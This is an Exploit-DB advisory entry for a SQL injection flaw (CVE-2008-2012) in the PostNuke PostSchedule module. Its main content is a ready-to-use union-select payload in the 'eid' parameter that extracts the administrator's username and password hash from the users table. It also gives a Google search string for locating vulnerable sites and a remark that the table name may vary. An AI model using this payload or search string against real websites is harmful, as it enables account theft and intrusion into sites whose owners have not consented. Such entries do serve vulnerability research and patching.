PostNuke Module PostSchedule eid SQL Injection Vulnerability

2008-04-25T00:00:00
ID EDB-ID:5495
Type exploitdb
Reporter Kacper
Modified 2008-04-25T00:00:00

Description

PostNuke Module PostSchedule (eid) SQL Injection Vulnerability. CVE-2008-2012. Webapps exploit for php platform

                                        
                                            Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.

Homepage: http://devilteam.pl/

# milw0rm.com [2008-04-25]